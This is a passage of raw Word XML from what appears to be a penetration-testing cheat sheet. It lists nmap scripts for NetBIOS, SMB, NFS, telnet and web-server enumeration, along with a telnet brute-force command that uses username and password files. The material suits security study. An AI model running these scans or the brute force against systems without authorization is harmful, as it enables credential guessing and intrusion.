              <w:t>Nmap also allows you to run scripts using wildcards, meaning you can target multiple scripts that finish or end up with any pattern. For example, if you want to run all the scripts that begin with ‘ftp’, you could simply use this syntax:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1B4F7000" w14:textId="7FE8056C" w:rsidR="00235FF8" w:rsidRPr="005D321C" w:rsidRDefault="00235FF8" w:rsidP="00F2233F">
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="005D321C">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">nmap </w:t>
            </w:r>
            <w:r w:rsidRPr="005D321C">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">--script </w:t>
            </w:r>
            <w:r w:rsidRPr="005D321C">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>"</w:t>
            </w:r>
            <w:r w:rsidRPr="005D321C">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>ftp-\*</w:t>
            </w:r>
            <w:r w:rsidRPr="005D321C">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>"</w:t>
            </w:r>
            <w:r w:rsidRPr="005D321C">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve"> 192.168.122.1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7BEF27DD" w14:textId="2C8D442C" w:rsidR="00235FF8" w:rsidRPr="005D321C" w:rsidRDefault="00235FF8" w:rsidP="00F2233F">
            <w:r w:rsidRPr="005D321C">
              <w:t>The same goes for SSH:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1E1CEEFA" w14:textId="0324F9FF" w:rsidR="00235FF8" w:rsidRPr="00406CC8" w:rsidRDefault="00235FF8" w:rsidP="00F2233F">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="005D321C">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">nmap </w:t>
            </w:r>
            <w:r w:rsidRPr="005D321C">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">--script </w:t>
            </w:r>
            <w:r w:rsidRPr="005D321C">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>"</w:t>
            </w:r>
            <w:r w:rsidRPr="005D321C">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>ssh-\*</w:t>
            </w:r>
            <w:r w:rsidRPr="005D321C">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>"</w:t>
            </w:r>
            <w:r w:rsidRPr="005D321C">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve"> 192.168.122.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00235FF8" w14:paraId="0B78838A" w14:textId="77777777" w:rsidTr="00F2233F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="C5E0B3" w:themeFill="accent6" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="75AA8E21" w14:textId="1B6D79DB" w:rsidR="00235FF8" w:rsidRDefault="00235FF8" w:rsidP="00F2233F">
            <w:r>
              <w:t>42.d</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2B1B90E2" w14:textId="10E9A46C" w:rsidR="00235FF8" w:rsidRPr="00F4574C" w:rsidRDefault="00F2233F" w:rsidP="00F2233F">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">nmap </w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00F2233F">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>(NetBIOS enumeration)</w:t>
            </w:r>
            <w:r w:rsidR="00607569">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidR="00607569">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:br/>
              <w:t>(Usually only able to attack NetBIOS on a Windows OS)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8024" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="5B92028B" w14:textId="17B341A9" w:rsidR="00235FF8" w:rsidRPr="005D321C" w:rsidRDefault="00607569" w:rsidP="00F2233F">
            <w:r>
              <w:t xml:space="preserve">If port 139/tcp is open, it is possible to check to see which resources can be accessed or viewed on the target system (if file and printer sharing is enabled)- </w:t>
            </w:r>
            <w:r w:rsidR="00235FF8">
              <w:t>nmap can use:</w:t>
            </w:r>
            <w:r w:rsidR="00235FF8">
              <w:br/>
            </w:r>
            <w:r w:rsidR="00235FF8">
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00235FF8" w:rsidRPr="00B03AD0">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>--script</w:t>
            </w:r>
            <w:r w:rsidR="00B03AD0" w:rsidRPr="00B03AD0">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00B03AD0" w:rsidRPr="00D841FB">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>nbstat.nse</w:t>
            </w:r>
            <w:r w:rsidR="00D841FB">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidR="00D841FB" w:rsidRPr="00D841FB">
              <w:t>The scan results appear, displaying the open ports and services, along with their versions. Displayed under the Host script results section are details about the target system such as the NetBIOS name, NetBIOS user, and NetBIOS MAC</w:t>
            </w:r>
            <w:r w:rsidR="00D841FB">
              <w:t xml:space="preserve"> address.</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t>NetBIOS uses ports 139/tcp (session services), 137/udp (name services) and 138/udp (datagram services).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00011EE4" w14:paraId="09FE6BAA" w14:textId="77777777" w:rsidTr="00F2233F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="C5E0B3" w:themeFill="accent6" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="0FF09DA1" w14:textId="0A66817A" w:rsidR="00011EE4" w:rsidRDefault="00011EE4" w:rsidP="00F2233F">
            <w:r>
              <w:t>42.e</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1CDBD21A" w14:textId="729EB957" w:rsidR="00011EE4" w:rsidRDefault="00011EE4" w:rsidP="00F2233F">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>nmap</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00011EE4">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>(SMB enumeration)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8024" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="3FEB48A3" w14:textId="77777777" w:rsidR="00011EE4" w:rsidRDefault="00011EE4" w:rsidP="00F2233F">
            <w:pPr>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>An inbuilt script used for collecting OS information on the target machine via SMB protocol is:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00011EE4">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>--script</w:t>
            </w:r>
            <w:r w:rsidRPr="00011EE4">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00011EE4">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>smb-os-discovery</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2B1B1602" w14:textId="5A268D74" w:rsidR="00FE283C" w:rsidRDefault="00FE283C" w:rsidP="00F2233F">
            <w:r>
              <w:t>Another script to enumerate SMB shares and users is:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3817F428" w14:textId="697F1E34" w:rsidR="00FE283C" w:rsidRDefault="00FE283C" w:rsidP="00F2233F">
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00FE283C">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>--script</w:t>
            </w:r>
            <w:r w:rsidR="001A7851">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00FE283C">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>smb-enum-shares.nse</w:t>
            </w:r>
            <w:r w:rsidR="001A7851">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="001A7851">
              <w:rPr>
                <w:color w:val="92D050"/>
              </w:rPr>
              <w:t>smb-enum-users.nse</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004526B4" w14:paraId="5F0880F3" w14:textId="77777777" w:rsidTr="00F2233F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="C5E0B3" w:themeFill="accent6" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="61880327" w14:textId="6586DBFB" w:rsidR="004526B4" w:rsidRDefault="004526B4" w:rsidP="00F2233F">
            <w:r>
              <w:t>42.f</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3791344E" w14:textId="77777777" w:rsidR="004526B4" w:rsidRDefault="004526B4" w:rsidP="00F2233F">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>nmap</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="39EDD9CB" w14:textId="3D326C39" w:rsidR="004526B4" w:rsidRPr="004526B4" w:rsidRDefault="004526B4" w:rsidP="00F2233F">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004526B4">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>(NFS enumeration)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8024" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0C1F6141" w14:textId="77777777" w:rsidR="004526B4" w:rsidRPr="004526B4" w:rsidRDefault="004526B4" w:rsidP="004526B4">
            <w:r w:rsidRPr="004526B4">
              <w:t>It could be that port 111 is open for rpcbind, we can enumerate via:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="74C9066D" w14:textId="66C1B7A5" w:rsidR="004526B4" w:rsidRDefault="004526B4" w:rsidP="004526B4">
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="004526B4">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">nmap </w:t>
            </w:r>
            <w:r w:rsidRPr="004526B4">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">-p </w:t>
            </w:r>
            <w:r w:rsidRPr="004526B4">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>111</w:t>
            </w:r>
            <w:r w:rsidRPr="004526B4">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="004526B4">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>--script</w:t>
            </w:r>
            <w:r w:rsidR="004B3A3C">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="004526B4">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>nfs-ls</w:t>
            </w:r>
            <w:r w:rsidR="004B3A3C" w:rsidRPr="004B3A3C">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r w:rsidRPr="004526B4">
              <w:rPr>
                <w:color w:val="92D050"/>
              </w:rPr>
              <w:t>nfs-statfs</w:t>
            </w:r>
            <w:r w:rsidR="004B3A3C" w:rsidRPr="004B3A3C">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r w:rsidRPr="004526B4">
              <w:rPr>
                <w:color w:val="385623" w:themeColor="accent6" w:themeShade="80"/>
              </w:rPr>
              <w:t>nfs-showmount</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD23A8" w14:paraId="1A69854F" w14:textId="77777777" w:rsidTr="00F2233F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="C5E0B3" w:themeFill="accent6" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="15728605" w14:textId="0D6714AC" w:rsidR="00DD23A8" w:rsidRDefault="00DD23A8" w:rsidP="00F2233F">
            <w:r>
              <w:t>42.</w:t>
            </w:r>
            <w:r w:rsidR="004526B4">
              <w:t>g</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658C1C1F" w14:textId="5D89828E" w:rsidR="00DD23A8" w:rsidRDefault="00DD23A8" w:rsidP="00F2233F">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>nmap</w:t>
            </w:r>
            <w:r w:rsidR="007F20A0">
              <w:br/>
            </w:r>
            <w:r w:rsidR="007F20A0" w:rsidRPr="007F20A0">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>(telnet enumeration and brute force)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8024" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="4B1FB4D7" w14:textId="2EAD18D8" w:rsidR="00DD23A8" w:rsidRDefault="00DD23A8" w:rsidP="00F2233F">
            <w:r>
              <w:t>An inbuilt script used for enumerating telnet (if the service is open) is:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00DD23A8">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">nmap </w:t>
            </w:r>
            <w:r w:rsidRPr="00DD23A8">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">-p </w:t>
            </w:r>
            <w:r w:rsidRPr="007F20A0">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>23</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00DD23A8">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">--script </w:t>
            </w:r>
            <w:r w:rsidRPr="00DD23A8">
              <w:rPr>
                <w:color w:val="92D050"/>
              </w:rPr>
              <w:t xml:space="preserve">telnet-ntlm-info </w:t>
            </w:r>
            <w:r w:rsidRPr="00DD23A8">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>TARGET.IP.ADD.RESS</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:br/>
              <w:t>A brute-force attack is possible using:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="007F20A0">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">nmap </w:t>
            </w:r>
            <w:r w:rsidRPr="007F20A0">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-p</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="007F20A0">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>23</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="007F20A0">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">--script </w:t>
            </w:r>
            <w:r w:rsidRPr="007F20A0">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>telne</w:t>
            </w:r>
            <w:r w:rsidR="007F20A0">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>t</w:t>
            </w:r>
            <w:r w:rsidRPr="007F20A0">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>-brute.nse</w:t>
            </w:r>
            <w:r w:rsidR="007F20A0">
              <w:tab/>
            </w:r>
            <w:r w:rsidR="007F20A0">
              <w:tab/>
              <w:t>(All one command)</w:t>
            </w:r>
            <w:r w:rsidR="007F20A0">
              <w:br/>
            </w:r>
            <w:r w:rsidR="007F20A0">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="007F20A0">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
            <w:r w:rsidR="007F20A0" w:rsidRPr="007F20A0">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-script-args userdb=</w:t>
            </w:r>
            <w:r w:rsidR="007F20A0" w:rsidRPr="007F20A0">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>USER.txt</w:t>
            </w:r>
            <w:r w:rsidR="007F20A0" w:rsidRPr="007F20A0">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>,passdb=</w:t>
            </w:r>
            <w:r w:rsidR="007F20A0" w:rsidRPr="007F20A0">
              <w:rPr>
                <w:color w:val="92D050"/>
              </w:rPr>
              <w:t>PASSWORD.txt</w:t>
            </w:r>
            <w:r w:rsidR="007F20A0">
              <w:br/>
            </w:r>
            <w:r w:rsidR="007F20A0">
              <w:lastRenderedPageBreak/>
              <w:t>Ensure that you place possible usernames and passwords in the respective files and run the nmap scan from the same directory where these files are stored.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C2FDC" w14:paraId="4107AB26" w14:textId="77777777" w:rsidTr="00F2233F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="C5E0B3" w:themeFill="accent6" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="560FD6B5" w14:textId="3CAE7731" w:rsidR="005C2FDC" w:rsidRDefault="005C2FDC" w:rsidP="00F2233F">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>42.</w:t>
            </w:r>
            <w:r w:rsidR="004526B4">
              <w:t>h</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16CA291C" w14:textId="77777777" w:rsidR="005C2FDC" w:rsidRDefault="005C2FDC" w:rsidP="00F2233F">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>nmap</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="38ACCC33" w14:textId="507FDB76" w:rsidR="005C2FDC" w:rsidRPr="005C2FDC" w:rsidRDefault="005C2FDC" w:rsidP="00F2233F">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C2FDC">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>web server enumeration)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8024" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="1F231073" w14:textId="77777777" w:rsidR="005C2FDC" w:rsidRDefault="005C2FDC" w:rsidP="00F2233F">
            <w:r>
              <w:t>An inbuilt script that can enumerate a web app is:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="005C2FDC">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>--script</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="005C2FDC">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>http-enum</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:br/>
            </w:r>
          </w:p>
          <w:p w14:paraId="58229053" w14:textId="11BDBC91" w:rsidR="005C2FDC" w:rsidRDefault="005C2FDC" w:rsidP="00F2233F">
            <w:r>
              <w:t>Then, the next step may be to discover the hostnames that resolve the targeted domain:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="000C4383" w:rsidRPr="000C4383">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">--script </w:t>
            </w:r>
            <w:r w:rsidR="000C4383" w:rsidRPr="000C4383">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve">hostmap-bfk </w:t>
            </w:r>
            <w:r w:rsidR="000C4383" w:rsidRPr="000C4383">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">-script-args </w:t>
            </w:r>
            <w:r w:rsidR="000C4383" w:rsidRPr="000C4383">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>hostmap-bfk.prefix</w:t>
            </w:r>
            <w:r w:rsidR="000C4383" w:rsidRPr="000C4383">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>=hostmap-</w:t>
            </w:r>
            <w:r w:rsidR="000C4383">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidR="000C4383">
              <w:t>Next, you may need to try an HTTP trace on the targeted domain:</w:t>
            </w:r>
            <w:r w:rsidR="000C4383">
              <w:br/>
            </w:r>
            <w:r w:rsidR="000C4383">
              <w:tab/>
            </w:r>
            <w:r w:rsidR="000C4383" w:rsidRPr="000C4383">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">--script </w:t>
            </w:r>
            <w:r w:rsidR="000C4383" w:rsidRPr="000C4383">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve">http-trace </w:t>
            </w:r>
            <w:r w:rsidR="000C4383" w:rsidRPr="000C4383">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-d</w:t>
            </w:r>
            <w:r w:rsidR="00625B4F">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00625B4F">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00625B4F" w:rsidRPr="00625B4F">
              <w:t>(Here, -d will show debugging info)</w:t>
            </w:r>
            <w:r w:rsidR="00625B4F">
              <w:br/>
              <w:t>And finally, you may need to check whether a WAF is configured on the target:~</w:t>
            </w:r>
            <w:r w:rsidR="00625B4F">
              <w:br/>
            </w:r>
            <w:r w:rsidR="00625B4F">
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00625B4F" w:rsidRPr="00625B4F">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">--script </w:t>
            </w:r>
            <w:r w:rsidR="00625B4F" w:rsidRPr="00625B4F">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>http-waf-detect</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00406CC8" w14:paraId="76C5D4F3" w14:textId="77777777" w:rsidTr="00F2233F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="C5E0B3" w:themeFill="accent6" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="3225E793" w14:textId="77777777" w:rsidR="00004A4A" w:rsidRDefault="00004A4A" w:rsidP="00F2233F"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2392" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E2EFD9" w:themeFill="accent6" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="7331C8A4" w14:textId="77777777" w:rsidR="00004A4A" w:rsidRDefault="00004A4A" w:rsidP="00F2233F">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8024" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="57EB3E67" w14:textId="77777777" w:rsidR="00004A4A" w:rsidRPr="000C65EE" w:rsidRDefault="00004A4A" w:rsidP="00F2233F"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5B781E20" w14:textId="6497E459" w:rsidR="006E4E41" w:rsidRDefault="006E4E41"/>
    <w:p w14:paraId="5A8C1D98" w14:textId="77777777" w:rsidR="005C2FDC" w:rsidRDefault="005C2FDC">
      <w:pPr>
